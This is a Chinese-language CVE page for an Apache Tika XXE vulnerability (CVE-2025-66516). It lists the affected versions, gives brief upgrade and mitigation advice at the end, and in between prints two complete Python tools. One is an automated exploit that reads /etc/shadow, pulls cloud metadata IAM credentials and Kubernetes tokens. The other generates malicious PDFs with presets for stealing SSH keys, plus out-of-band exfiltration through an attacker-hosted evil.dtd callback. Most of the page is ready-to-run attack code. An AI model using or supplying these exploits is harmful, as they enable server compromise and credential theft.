影响版本
Apache Tika core (org.apache.tika:tika-core):1.13 - 3.2.1
Apache Tika parsers (org.apache.tika:tika-parsers):1.13 - < 2.0.0
Apache Tika PDF parser module (org.apache.tika:tika-parser-pdf-module):2.0.0 - 3.2.1
p
#!/usr/bin/env python3
"""
CVE-2025-66516 Automated Exploitation Tool
===========================================
Full-chain exploitation tool for Apache Tika XXE vulnerability.
Automatically generates payloads, tests against target, and extracts data.
VULNERABILITY BACKGROUND:
-------------------------
Apache Tika versions 1.13 through 3.2.1 fail to properly configure the
underlying StAX XML parser to disable external entity resolution when
processing XFA data within PDF documents.
THE INCIDENTAL WOODSTOX PROTECTION:
-----------------------------------
The standard tika-server-standard.jar bundles the Woodstox XML parser,
which has secure defaults and blocks external entity resolution. This
tool is effective against:
- Embedded Tika deployments using JDK's default StAX parser
- Custom deployments without Woodstox on classpath
- Applications explicitly using the JDK reference implementation
USAGE:
------
# Basic file read exploitation
python exploit.py --url http://target:9998 --file /etc/passwd
# Test if target is vulnerable
python exploit.py --url http://target:9998 --check
# AWS metadata theft (SSRF)
python exploit.py --url http://target:9998 --aws-metadata
# Read multiple files
python exploit.py --url http://target:9998 --file /etc/passwd --file /etc/shadow
# Kubernetes secrets extraction
python exploit.py --url http://target:9998 --k8s-secrets
# Save extracted data to file
python exploit.py --url http://target:9998 --file /etc/passwd --save output.txt
"""
import sys
import io
import os
import re
import argparse
import tempfile
try:
import requests
except ImportError:
print("Error: requests library required. Install with: pip install requests")
sys.exit(1)
class TikaExploit:
"""Automated exploitation of CVE-2025-66516"""
def __init__(self, tika_url, timeout=30, verbose=False):
self.tika_url = tika_url.rstrip('/')
self.timeout = timeout
self.verbose = verbose
self.session = requests.Session()
def log(self, message):
"""Print verbose output"""
if self.verbose:
print(f"[DEBUG] {message}")
def check_connectivity(self):
"""Verify Tika server is reachable"""
try:
resp = self.session.get(f"{self.tika_url}/version", timeout=5)
if resp.status_code == 200:
return True, resp.text.strip()
return False, f"HTTP {resp.status_code}"
except requests.RequestException as e:
return False, str(e)
def generate_payload_pdf(self, target):
"""Generate PDF with XXE payload targeting specified file/URL"""
if target.startswith("http://") or target.startswith("https://"):
entity_uri = target
else:
entity_uri = f"file://{target}"
xfa_content = f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY xxe SYSTEM "{entity_uri}">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
<config xmlns="http://www.xfa.org/schema/xci/3.1/">
<present><pdf><version>1.7</version></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
<subform name="form1" layout="tb">
<pageSet><pageArea><contentArea/><medium stock="letter"/></pageArea></pageSet>
<subform>
<field name="data"><ui><textEdit/></ui><value><text>&xxe;</text></value></field>
</subform>
</subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data><form1><data>&xxe;</data></form1></xfa:data>
</xfa:datasets>
</xdp:xdp>'''
# Build minimal PDF
pdf = io.BytesIO()
offsets = {}
def write(data):
if isinstance(data, str):
data = data.encode('utf-8')
pdf.write(data)
def obj_start(num):
offsets[num] = pdf.tell()
write(b'%PDF-1.7\n%\xe2\xe3\xcf\xd3\n')
obj_start(1)
write(b'1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>\nendobj\n')
obj_start(2)
write(b'2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n')
obj_start(3)
write(b'3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\nendobj\n')
obj_start(4)
write(b'4 0 obj\n<< /Length 0 >>\nstream\nendstream\nendobj\n')
obj_start(5)
write(b'5 0 obj\n<< /Fields [] /XFA 6 0 R /NeedAppearances true >>\nendobj\n')
xfa_bytes = xfa_content.encode('utf-8')
obj_start(6)
write(f'6 0 obj\n<< /Length {len(xfa_bytes)} >>\nstream\n'.encode())
write(xfa_bytes)
write(b'\nendstream\nendobj\n')
xref_offset = pdf.tell()
write(b'xref\n0 7\n0000000000 65535 f \n')
for i in range(1, 7):
write(f'{offsets.get(i, 0):010d} 00000 n \n'.encode())
write(f'trailer\n<< /Size 7 /Root 1 0 R >>\nstartxref\n{xref_offset}\n%%EOF\n'.encode())
return pdf.getvalue()
def send_payload(self, pdf_data):
"""Send PDF payload to Tika and return response"""
try:
resp = self.session.put(
f"{self.tika_url}/tika",
data=pdf_data,
headers={"Content-Type": "application/pdf"},
timeout=self.timeout
)
return resp.status_code, resp.text
except requests.RequestException as e:
return None, str(e)
def extract_data(self, response_text, target):
"""Extract exfiltrated data from Tika response"""
# Look for data in XFA form field output
# Tika outputs XFA field data in format: fieldName="data">data: CONTENT</li>
patterns = [
r'fieldName="data">data:\s*(.*?)</li>',
r'<data>(.*?)</data>',
r'<text>(.*?)</text>',
]
for pattern in patterns:
matches = re.findall(pattern, response_text, re.DOTALL)
for match in matches:
content = match.strip()
# Filter out empty or placeholder content
if content and content != "test" and content != "&xxe;":
return content
return None
def exploit_file(self, file_path):
"""Attempt to read a file from target system"""
self.log(f"Generating payload for: {file_path}")
pdf_data = self.generate_payload_pdf(file_path)
self.log(f"Sending {len(pdf_data)} byte payload to {self.tika_url}")
status, response = self.send_payload(pdf_data)
if status is None:
return {"success": False, "error": response}
if status != 200:
return {"success": False, "error": f"HTTP {status}"}
extracted = self.extract_data(response, file_path)
if extracted:
return {"success": True, "data": extracted, "target": file_path}
else:
return {"success": False, "error": "No data extracted (target may be protected by Woodstox)"}
def exploit_ssrf(self, url):
"""Perform SSRF attack"""
self.log(f"Generating SSRF payload for: {url}")
pdf_data = self.generate_payload_pdf(url)
self.log(f"Sending SSRF payload to {self.tika_url}")
status, response = self.send_payload(pdf_data)
if status is None:
return {"success": False, "error": response}
if status != 200:
return {"success": False, "error": f"HTTP {status}"}
extracted = self.extract_data(response, url)
if extracted:
return {"success": True, "data": extracted, "target": url}
else:
return {"success": False, "error": "No data extracted"}
def check_vulnerable(self):
"""
Check if target is vulnerable by attempting to read /etc/passwd
or a non-existent file (to detect error-based information disclosure)
"""
# Try to read /etc/passwd
result = self.exploit_file("/etc/passwd")
if result["success"]:
return True, "Target is VULNERABLE - file read confirmed"
# Try a canary file - if we get a specific error, XXE is working
canary = "/tmp/xxe_test_nonexistent_12345"
pdf_data = self.generate_payload_pdf(canary)
status, response = self.send_payload(pdf_data)
if status == 200:
# Check for error messages indicating XXE processing
if "FileNotFoundException" in response or "No such file" in response:
return True, "Target is VULNERABLE - error-based XXE confirmed"
return False, "Target appears protected (likely using Woodstox)"
def main():
parser = argparse.ArgumentParser(
description='CVE-2025-66516 Automated Exploitation Tool',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --url http://target:9998 --check
%(prog)s --url http://target:9998 --file /etc/passwd
%(prog)s --url http://target:9998 --aws-metadata
%(prog)s --url http://target:9998 --k8s-secrets
%(prog)s --url http://target:9998 --file /etc/passwd --save loot.txt
"""
)
parser.add_argument('--url', '-u', required=True, help='Target Tika server URL')
parser.add_argument('--file', '-f', action='append', help='File to read (can specify multiple)')
parser.add_argument('--ssrf', '-s', action='append', help='URL for SSRF (can specify multiple)')
parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
parser.add_argument('--aws-metadata', action='store_true', help='Attempt AWS metadata extraction')
parser.add_argument('--gcp-metadata', action='store_true', help='Attempt GCP metadata extraction')
parser.add_argument('--k8s-secrets', action='store_true', help='Attempt Kubernetes secrets extraction')
parser.add_argument('--save', help='Save extracted data to file')
parser.add_argument('--timeout', type=int, default=30, help='Request timeout in seconds')
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
args = parser.parse_args()
print("""
+==============================================================+
| CVE-2025-66516 Apache Tika XXE Exploitation Tool |
| For authorized security testing only |
+==============================================================+
""")
exploit = TikaExploit(args.url, timeout=args.timeout, verbose=args.verbose)
# Check connectivity
print(f"[*] Target: {args.url}")
reachable, version = exploit.check_connectivity()
if not reachable:
print(f"[-] Cannot reach target: {version}")
return 1
print(f"[+] Tika version: {version}")
results = []
# Vulnerability check
if args.check:
print("\n[*] Checking vulnerability status...")
vulnerable, message = exploit.check_vulnerable()
if vulnerable:
print(f"[+] {message}")
else:
print(f"[-] {message}")
return 0 if vulnerable else 1
# File read attacks
if args.file:
print(f"\n[*] Attempting to read {len(args.file)} file(s)...")
for file_path in args.file:
print(f"\n[*] Target: {file_path}")
result = exploit.exploit_file(file_path)
if result["success"]:
print(f"[+] SUCCESS - Data extracted:")
print("-" * 50)
print(result["data"][:2000])
if len(result["data"]) > 2000:
print(f"... [{len(result['data']) - 2000} more bytes]")
print("-" * 50)
results.append(result)
else:
print(f"[-] Failed: {result['error']}")
# SSRF attacks
if args.ssrf:
print(f"\n[*] Attempting {len(args.ssrf)} SSRF request(s)...")
for url in args.ssrf:
print(f"\n[*] Target: {url}")
result = exploit.exploit_ssrf(url)
if result["success"]:
print(f"[+] SUCCESS - Response received:")
print("-" * 50)
print(result["data"][:2000])
print("-" * 50)
results.append(result)
else:
print(f"[-] Failed: {result['error']}")
# AWS metadata
if args.aws_metadata:
print("\n[*] Attempting AWS metadata extraction...")
aws_targets = [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://169.254.169.254/latest/dynamic/instance-identity/document",
]
for url in aws_targets:
print(f"\n[*] Target: {url}")
result = exploit.exploit_ssrf(url)
if result["success"]:
print(f"[+] SUCCESS:")
print(result["data"][:1000])
results.append(result)
# If we got IAM role name, try to get credentials
if "iam/security-credentials/" in url and result["data"]:
role_name = result["data"].strip().split('\n')[0]
creds_url = f"http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}"
print(f"\n[*] Fetching credentials for role: {role_name}")
creds_result = exploit.exploit_ssrf(creds_url)
if creds_result["success"]:
print(f"[+] AWS CREDENTIALS EXTRACTED:")
print(creds_result["data"])
results.append(creds_result)
# GCP metadata
if args.gcp_metadata:
print("\n[*] Attempting GCP metadata extraction...")
gcp_targets = [
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
"http://metadata.google.internal/computeMetadata/v1/project/project-id",
]
for url in gcp_targets:
print(f"\n[*] Target: {url}")
result = exploit.exploit_ssrf(url)
if result["success"]:
print(f"[+] SUCCESS:")
print(result["data"][:1000])
results.append(result)
# Kubernetes secrets
if args.k8s_secrets:
print("\n[*] Attempting Kubernetes secrets extraction...")
k8s_targets = [
"/var/run/secrets/kubernetes.io/serviceaccount/token",
"/var/run/secrets/kubernetes.io/serviceaccount/namespace",
"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
]
for file_path in k8s_targets:
print(f"\n[*] Target: {file_path}")
result = exploit.exploit_file(file_path)
if result["success"]:
print(f"[+] SUCCESS:")
print(result["data"][:1000])
results.append(result)
# Save results
if args.save and results:
print(f"\n[*] Saving results to {args.save}")
with open(args.save, 'w') as f:
for r in results:
f.write(f"=== {r['target']} ===\n")
f.write(r['data'])
f.write("\n\n")
print(f"[+] Saved {len(results)} result(s)")
# Summary
print(f"\n{'='*60}")
if results:
print(f"[+] Exploitation successful: {len(results)} target(s) extracted")
return 0
else:
print("[-] No data extracted - target may be protected by Woodstox")
return 1
if __name__ == "__main__":
sys.exit(main())
生成pdf
#!/usr/bin/env python3
"""
CVE-2025-66516 Malicious PDF Payload Generator
===============================================
Generates PDF documents with embedded XFA (XML Forms Architecture) content
containing XXE (XML External Entity) payloads for exploiting Apache Tika.
VULNERABILITY BACKGROUND:
-------------------------
Apache Tika versions 1.13 through 3.2.1 fail to properly configure the
underlying StAX XML parser to disable external entity resolution when
processing XFA data within PDF documents. This allows attackers to:
- Read arbitrary files from the server
- Perform Server-Side Request Forgery (SSRF)
- Exfiltrate data to external servers
IMPORTANT: The standard tika-server-standard.jar bundles Woodstox, which
has secure defaults and is NOT vulnerable. This exploit works against:
- Embedded Tika deployments (tika-core + parser modules)
- Custom deployments without Woodstox on classpath
- Applications using JDK's default StAX parser
USAGE:
------
# Generate payload to read /etc/passwd
python generate_payload.py --target /etc/passwd --output exploit.pdf
# Generate SSRF payload for AWS metadata
python generate_payload.py --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf
# Generate payload with OOB exfiltration
python generate_payload.py --target /etc/passwd --callback http://attacker.com:8080 --output oob.pdf
# Use attack mode presets
python generate_payload.py --mode aws_metadata --output aws_exploit.pdf
python generate_payload.py --mode k8s_secrets --all-targets --output ./k8s_payloads/
# List available attack modes
python generate_payload.py --list-modes
"""
import sys
import io
import os
import argparse
# Predefined targets for different attack scenarios
ATTACK_PRESETS = {
"file_read": {
"targets": [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/proc/self/environ",
"/proc/self/cmdline",
],
"description": "Read local files from the server"
},
"ssh_keys": {
"targets": [
"/root/.ssh/id_rsa",
"/root/.ssh/id_ed25519",
"/home/ubuntu/.ssh/id_rsa",
"/home/ec2-user/.ssh/id_rsa",
],
"description": "Steal SSH private keys for lateral movement"
},
"aws_metadata": {
"targets": [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://169.254.169.254/latest/dynamic/instance-identity/document",
"http://169.254.169.254/latest/user-data",
],
"description": "Steal AWS EC2 instance metadata and IAM credentials"
},
"gcp_metadata": {
"targets": [
"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
"http://metadata.google.internal/computeMetadata/v1/project/project-id",
],
"description": "Steal GCP metadata and service account tokens"
},
"azure_metadata": {
"targets": [
"http://169.254.169.254/metadata/instance?api-version=2021-02-01",
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/",
],
"description": "Steal Azure instance metadata and managed identity tokens"
},
"k8s_secrets": {
"targets": [
"/var/run/secrets/kubernetes.io/serviceaccount/token",
"/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
"/var/run/secrets/kubernetes.io/serviceaccount/namespace",
],
"description": "Read Kubernetes service account credentials"
},
"webapp_configs": {
"targets": [
"/var/www/html/wp-config.php",
"/var/www/html/config/database.yml",
"/var/www/html/.env",
"/opt/tomcat/conf/server.xml",
"/opt/tomcat/conf/tomcat-users.xml",
],
"description": "Read common web application configuration files"
},
"ssrf_internal": {
"targets": [
"http://localhost:8080/",
"http://127.0.0.1:6379/INFO",
"http://127.0.0.1:11211/stats",
"http://127.0.0.1:9200/_cluster/health",
],
"description": "Probe internal services via SSRF"
},
}
class PayloadGenerator:
"""Generate PDF documents with XXE payloads in XFA content"""
def __init__(self, target, callback_url=None):
"""
Initialize the payload generator.
Args:
target: File path or URL to read/request
callback_url: Optional URL for OOB exfiltration
"""
self.target = target
self.callback_url = callback_url
def get_entity_uri(self):
"""Determine the correct URI scheme for the target"""
if self.target.startswith("http://") or self.target.startswith("https://"):
return self.target
else:
return f"file://{self.target}"
def generate_xfa_content(self):
"""
Generate complete XFA document with XXE payload.
The XXE entity is defined in the DOCTYPE and referenced in the
template and datasets sections where Tika extracts text content.
"""
entity_uri = self.get_entity_uri()
return f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY xxe SYSTEM "{entity_uri}">
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/" xml:lang="en">
<config xmlns="http://www.xfa.org/schema/xci/3.1/">
<present><pdf><version>1.7</version></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
<subform name="form1" layout="tb">
<pageSet>
<pageArea><contentArea/><medium stock="letter"/></pageArea>
</pageSet>
<subform>
<field name="data">
<ui><textEdit/></ui>
<value><text>&xxe;</text></value>
</field>
</subform>
</subform>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data><form1><data>&xxe;</data></form1></xfa:data>
</xfa:datasets>
</xdp:xdp>'''
def generate_oob_xfa_content(self):
"""
Generate XFA content for Out-of-Band (blind) XXE exfiltration.
This technique fetches an external DTD that constructs a URL
containing the file contents, sending data to attacker server.
"""
if not self.callback_url:
raise ValueError("Callback URL required for OOB payload")
return f'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp:xdp [
<!ENTITY % file SYSTEM "file://{self.target}">
<!ENTITY % dtd SYSTEM "{self.callback_url}/evil.dtd">
%dtd;
%send;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<template xmlns="http://www.xfa.org/schema/xfa-template/3.3/">
<subform name="form1">
<pageSet><pageArea><contentArea/><medium stock="letter"/></pageArea></pageSet>
</subform>
</template>
</xdp:xdp>'''
def generate_evil_dtd(self):
"""
Generate the external DTD file for OOB exfiltration.
Host this file on your callback server at /evil.dtd
"""
return f'''<!ENTITY % data SYSTEM "file://{self.target}">
<!ENTITY % param1 "<!ENTITY % send SYSTEM '{self.callback_url}/exfil?d=%data;'>">
%param1;'''
def create_pdf(self, xfa_content):
"""
Create a minimal valid PDF with embedded XFA content.
The PDF structure includes:
- Catalog with AcroForm reference
- Single page
- AcroForm with XFA stream
"""
pdf = io.BytesIO()
offsets = {}
def write(data):
if isinstance(data, str):
data = data.encode('utf-8')
pdf.write(data)
def obj_start(num):
offsets[num] = pdf.tell()
# PDF Header with binary marker
write(b'%PDF-1.7\n%\xe2\xe3\xcf\xd3\n')
# Object 1: Document Catalog
obj_start(1)
write(b'1 0 obj\n<< /Type /Catalog /Pages 2 0 R /AcroForm 5 0 R >>\nendobj\n')
# Object 2: Page Tree
obj_start(2)
write(b'2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n')
# Object 3: Page
obj_start(3)
write(b'3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >>\nendobj\n')
# Object 4: Empty Page Content
obj_start(4)
write(b'4 0 obj\n<< /Length 0 >>\nstream\nendstream\nendobj\n')
# Object 5: AcroForm with XFA reference
obj_start(5)
write(b'5 0 obj\n<< /Fields [] /XFA 6 0 R /NeedAppearances true >>\nendobj\n')
# Object 6: XFA Stream containing the payload
xfa_bytes = xfa_content.encode('utf-8')
obj_start(6)
write(f'6 0 obj\n<< /Length {len(xfa_bytes)} >>\nstream\n'.encode())
write(xfa_bytes)
write(b'\nendstream\nendobj\n')
# Cross-reference table
xref_offset = pdf.tell()
write(b'xref\n0 7\n')
write(b'0000000000 65535 f \n')
for i in range(1, 7):
write(f'{offsets.get(i, 0):010d} 00000 n \n'.encode())
# Trailer
write(f'trailer\n<< /Size 7 /Root 1 0 R >>\nstartxref\n{xref_offset}\n%%EOF\n'.encode())
return pdf.getvalue()
def save_payload(self, output_path):
"""Generate and save the standard XXE payload PDF"""
xfa_content = self.generate_xfa_content()
pdf_data = self.create_pdf(xfa_content)
with open(output_path, 'wb') as f:
f.write(pdf_data)
return len(pdf_data)
def save_oob_payload(self, output_path):
"""Generate and save the OOB XXE payload PDF and DTD"""
if not self.callback_url:
raise ValueError("Callback URL required for OOB payload")
xfa_content = self.generate_oob_xfa_content()
pdf_data = self.create_pdf(xfa_content)
with open(output_path, 'wb') as f:
f.write(pdf_data)
# Save the evil DTD
dtd_path = output_path.replace('.pdf', '_evil.dtd')
with open(dtd_path, 'w') as f:
f.write(self.generate_evil_dtd())
return len(pdf_data), dtd_path
def list_modes():
"""Display available attack mode presets"""
print("\nAvailable Attack Modes:")
print("=" * 60)
for mode, info in ATTACK_PRESETS.items():
print(f"\n {mode}:")
print(f" {info['description']}")
print(f" Targets ({len(info['targets'])}):")
for t in info['targets'][:3]:
print(f" - {t}")
if len(info['targets']) > 3:
print(f" ... and {len(info['targets']) - 3} more")
def main():
parser = argparse.ArgumentParser(
description='CVE-2025-66516 Malicious PDF Payload Generator',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --target /etc/passwd --output exploit.pdf
%(prog)s --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf
%(prog)s --target /etc/passwd --callback http://attacker:8080 --output oob.pdf
%(prog)s --mode aws_metadata --all-targets --output ./payloads/
%(prog)s --list-modes
"""
)
parser.add_argument('--target', '-t', help='Target file path or URL')
parser.add_argument('--mode', '-m', choices=list(ATTACK_PRESETS.keys()),
help='Use predefined attack mode')
parser.add_argument('--callback', '-c', help='Callback URL for OOB exfiltration')
parser.add_argument('--output', '-o', help='Output file or directory')
parser.add_argument('--all-targets', action='store_true',
help='Generate payloads for all targets in mode')
parser.add_argument('--list-modes', action='store_true', help='List attack modes')
args = parser.parse_args()
if args.list_modes:
list_modes()
return 0
if not args.output:
parser.error("--output is required when generating payloads")
return 1
# Determine targets
if args.mode:
mode_info = ATTACK_PRESETS[args.mode]
if args.all_targets:
targets = mode_info['targets']
else:
targets = [args.target] if args.target else [mode_info['targets'][0]]
print(f"[*] Attack Mode: {args.mode}")
print(f"[*] {mode_info['description']}")
elif args.target:
targets = [args.target]
else:
parser.error("Either --target or --mode is required")
return 1
# Handle output path
if len(targets) > 1 or args.all_targets:
# Multiple targets - output must be directory
os.makedirs(args.output, exist_ok=True)
output_dir = args.output
single_file = False
else:
# Single target - output is file path
output_dir = os.path.dirname(args.output) or '.'
os.makedirs(output_dir, exist_ok=True)
single_file = True
print(f"[*] Generating {len(targets)} payload(s)...")
for i, target in enumerate(targets):
gen = PayloadGenerator(target, args.callback)
if single_file:
output_path = args.output
else:
safe_name = target.replace("/", "_").replace(":", "_").replace("?", "_")[:40]
output_path = os.path.join(output_dir, f"payload_{i}_{safe_name}.pdf")
# Generate standard payload
size = gen.save_payload(output_path)
print(f"[+] Created: {output_path} ({size} bytes)")
print(f" Target: {target}")
# Generate OOB variant if callback specified
if args.callback:
oob_path = output_path.replace('.pdf', '_oob.pdf')
size, dtd_path = gen.save_oob_payload(oob_path)
print(f"[+] Created OOB: {oob_path} ({size} bytes)")
print(f"[+] Created DTD: {dtd_path}")
print(f" Host DTD at: {args.callback}/evil.dtd")
print(f"\n[*] Done. Generated {len(targets)} payload(s).")
return 0
if __name__ == "__main__":
sys.exit(main())
修复建议
升级所有Apache Tika组件至 3.2.2 或更高版本。
注意:仅升级 tika-parser-pdf-module 而 tika-core 未升级至 3.2.2 以上版本的系统仍受漏洞影响。
临时缓解措施(如果无法立即升级):
- 在应用中禁用XFA解析功能。配置XML解析器,禁用外部实体解析(如设置 XMLConstants.FEATURE_SECURE_PROCESSING)。
- 检测包含可疑XML外部实体声明的PDF文件。
- 过滤包含XFA内容的PDF。